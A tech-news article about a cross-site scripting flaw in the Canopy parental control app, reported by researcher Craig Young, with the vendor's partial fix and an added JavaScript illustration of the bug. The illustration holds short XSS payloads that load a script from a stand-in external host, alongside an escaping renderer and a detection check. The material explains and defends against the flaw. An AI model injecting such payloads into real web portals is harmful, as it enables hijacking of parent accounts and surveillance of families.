This top parental control app has a serious security flaw
Flaw can be used to compromise both the privacy and security of the child, parent, and their device
A flaw in the popular parental control app Canopy makes it vulnerable to cross-site scripting (XSS) attacks, cybersecurity researchers report.
The Canopy parental control app has an exhaustive list of features that allow parents to limit and monitor use of protected devices.
The app was advertised to Tripwire's Craig Young by his child's school. On examining it, Young discovered that the app fails to sanitize user input, so the flaw can be exploited by planting malicious JavaScript that executes inside the parent portal.
“When the parent logs in, the attacker would have access to the parent portal and all features a parent has for monitoring and controlling child devices. It looks like an attacker would be able to do this en masse to all customers of Canopy,” notes Young in his breakdown of the app’s flaws.
Abusing privileged access
Being a security researcher, Young was intrigued by the app’s list of features, many of which suggested that the app would have privileged access to the protected device. That privileged access has the potential to introduce risk to the protected devices and to the privacy of the children using them, Young argues.
While exploring the app he found that the block page, shown when a child tries to open a blocked site, lets the child request access to the blocked resource and includes a text box for sending a message to the parent. To Young’s surprise, that input field was not sanitized and accepted up to 50 characters, which he notes is enough to call in a malicious external script.
His first tests were relatively innocent examples of how a child could exploit the vulnerability to reach blocked resources, and even to pause monitoring protection altogether.
However, the threats arising from the vulnerability are far more serious, and Young has deliberately withheld details in his post because Canopy has not fixed all of the attack scenarios.
“I reached out to Canopy by phone and by email repeatedly. Ultimately, they produced a fix for the XSS from child to parent but failed to do anything to protect against the parent to child XSS or XSS through the URL of a blocked page request before becoming unresponsive. Canopy needs to implement sanitization of all user-input fields but has failed to do so,” claims Young.
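As an added illustration of the flaw class Young describes (this is not Canopy's code and is not taken from his write-up), the snippet below renders a constructed child-to-parent block-page request two ways: interpolating the stored fields straight into the parent portal's HTML, and output-encoding them first. The field names, the example hostnames, the renderer functions and the use of 50 characters as the text-box cap are all assumptions made for this example; it runs under Node.js.

```javascript
// Added illustration of stored XSS from a child's block-page message into the
// parent portal. NOT Canopy's code: the request shape, hostnames and renderers
// below are constructed for the example.
const MAX_MESSAGE_LEN = 50; // the text-box limit Young reports, used here as an assumption

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Constructed sample: a message a child could type into the block-page box.
// A script tag that pulls an external file fits comfortably in 50 characters.
const payload = '<script src=//x.example/a.js></script>';

function fitsInTextBox(msg) {
  return msg.length <= MAX_MESSAGE_LEN;
}

// Vulnerable renderer: interpolates the stored message and URL straight into
// the parent portal's HTML, so the parent's browser parses the tag and loads
// the external script when the request is viewed.
function renderRequestUnsafe(req) {
  return `<li class="request"><span class="url">${req.url}</span>` +
         `<p class="message">${req.message}</p></li>`;
}

// Hardened renderer: output-encodes every user-controlled value, including the
// requested URL (which Young reports as a second injection point).
function renderRequestSafe(req) {
  return `<li class="request"><span class="url">${escapeHtml(req.url)}</span>` +
         `<p class="message">${escapeHtml(req.message)}</p></li>`;
}

// Crude check for a test suite: does the rendered HTML still contain a live,
// unescaped script tag supplied by the user?
function containsLiveScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed request record: both the message and the requested URL carry a tag.
const sampleRequest = {
  url: 'https://blocked.example/page?x="><script src=//x.example/b.js></script>',
  message: payload,
};

console.log(fitsInTextBox(payload));                                    // true
console.log(containsLiveScriptTag(renderRequestUnsafe(sampleRequest)));  // true
console.log(containsLiveScriptTag(renderRequestSafe(sampleRequest)));    // false
```

In a real application the encoding would come from an auto-escaping template engine or framework rather than a hand-written helper, and a Content Security Policy that refuses scripts from arbitrary origins would blunt the external-script trick even where encoding is missed. The hardened renderer deliberately encodes the requested URL as well as the message, because Young reports the blocked-page URL as a second path for the same injection.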
With almost two decades of writing and reporting on Linux, Mayank Sharma would like everyone to think he’s TechRadar Pro’s expert on the topic. Of course, he’s just as interested in other computing topics, particularly cybersecurity, cloud, containers, and coding.